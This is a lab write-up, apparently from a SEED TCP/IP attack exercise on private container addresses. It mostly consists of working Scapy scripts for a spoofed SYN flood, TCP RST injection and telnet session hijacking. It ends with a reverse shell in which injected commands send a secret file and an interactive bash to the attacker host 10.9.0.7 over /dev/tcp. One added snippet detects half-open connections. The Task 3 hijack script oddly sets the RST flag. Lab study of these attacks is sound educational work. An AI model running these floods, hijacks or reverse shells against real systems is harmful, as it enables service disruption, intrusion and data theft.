TCP/IP Attack Lab
Starting the environment
Task 1.1: Launching the Attack Using Python
Before the attack, check the current connection state:
netstat -tna
#!/usr/bin/env python3
from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbits

ip = IP(dst="10.9.0.5")
tcp = TCP(dport=23, flags='S')
pkt = ip/tcp

while True:
    pkt[IP].src = str(IPv4Address(getrandbits(32)))  # source IP
    pkt[TCP].sport = getrandbits(16)                 # source port
    pkt[TCP].seq = getrandbits(32)                   # sequence number
    send(pkt, verbose=0)
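Let the attack run for at least one minute, then try to connect to the victim machine and see whether you can succeed. Your attack will quite likely fail. Here, logging in to the victim host shows many half-open connections.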
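
A defender-side check for the half-open connections seen above, as an added example that is not part of the original post: it parses `netstat -tna` output and counts SYN_RECV entries per local port. The sample output, the function name `half_open_report` and the threshold are assumptions made for the illustration.

```python
from collections import Counter

# Constructed sample of `netstat -tna` output on the victim (10.9.0.5);
# the foreign addresses are made-up documentation addresses.
SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 10.9.0.5:23             203.0.113.7:40112       SYN_RECV
tcp        0      0 10.9.0.5:23             198.51.100.24:1552      SYN_RECV
tcp        0      0 10.9.0.5:23             192.0.2.99:60001        SYN_RECV
tcp        0      0 10.9.0.5:23             10.9.0.6:36030          ESTABLISHED
"""


def half_open_report(netstat_text, threshold=50):
    """Summarise half-open (SYN_RECV) connections per local port.

    threshold is an assumed alerting level, not a value from the lab.
    """
    counts = Counter()
    sources = {}
    for line in netstat_text.splitlines():
        fields = line.split()
        # Connection rows have exactly six columns and start with tcp/tcp6.
        if len(fields) != 6 or not fields[0].startswith("tcp"):
            continue
        local, foreign, state = fields[3], fields[4], fields[5]
        if state != "SYN_RECV":
            continue
        port = int(local.rsplit(":", 1)[1])
        counts[port] += 1
        sources.setdefault(port, set()).add(foreign.rsplit(":", 1)[0])
    return {
        port: {
            "half_open": n,
            # Randomised spoofed sources make almost every entry distinct.
            "distinct_sources": len(sources[port]),
            "suspect": n >= threshold,
        }
        for port, n in counts.items()
    }


if __name__ == "__main__":
    for port, info in half_open_report(SAMPLE, threshold=3).items():
        print(port, info)
```
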
Task 1.2: Launch the Attack Using C
Task 2: TCP RST Attacks on telnet Connections
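On 10.9.0.6, run telnet 10.9.0.7 and capture the traffic with Wireshark.
Based on the captured packet sent from 10.9.0.7 to 10.9.0.6, modify the Python file as follows: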
#!/usr/bin/env python3
from scapy.all import *
ip = IP(src="10.9.0.6", dst="10.9.0.7")
tcp = TCP(sport=36030, dport=23, flags="R", seq=1574683417, ack=2506752736)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)
The connection to 10.9.0.7 is dropped.
Task 3: TCP Session Hijacking
Modify the code and add data (any hexadecimal string):
#!/usr/bin/env python3
from scapy.all import *
ip = IP(src="10.9.0.6", dst="10.9.0.7")
tcp = TCP(sport=36074, dport=23, flags="R", seq=2758682726, ack=3314205569)
data="68656c6c6f20776f726c64"
pkt = ip/tcp/data
ls(pkt)
send(pkt,verbose=0)
Task 4: Creating Reverse Shell using TCP Session Hijacking
Attacker machine: 10.9.0.7
nc -lv 9090
Start a listener on the attacker machine.
Victim machine: 10.9.0.5
cat /home/seed/secret> /dev/tcp/10.9.0.7/9090
$ /bin/bash -i > /dev/tcp/10.9.0.7/9090 0<&1 2>&1
Then, on 10.9.0.6, telnet to 10.9.0.5 and capture the packets to obtain the following parameters:
#!/usr/bin/env python3
from scapy.all import *
print("SENDING SESSION HIJACKING PACKET.........")
IPLayer = IP(src="10.9.0.6", dst="10.9.0.5")
# Parameters of the TCP packet sent from 10.9.0.6 to 10.9.0.5
TCPLayer = TCP(sport=48852, dport=23, flags="A", seq=3017821363, ack=2102281185)
Data = "\r cat /home/seed/secret > /dev/tcp/10.9.0.7/9090\r"
pkt = IPLayer/TCPLayer/Data
ls(pkt)
send(pkt,verbose=0)
# Transmission Control Protocol, Src Port: 48852, Dst Port: 23, Seq: 3017821363, Ack: 2102281185, Len: 0
The attacker obtains a shell and can execute commands on the victim server.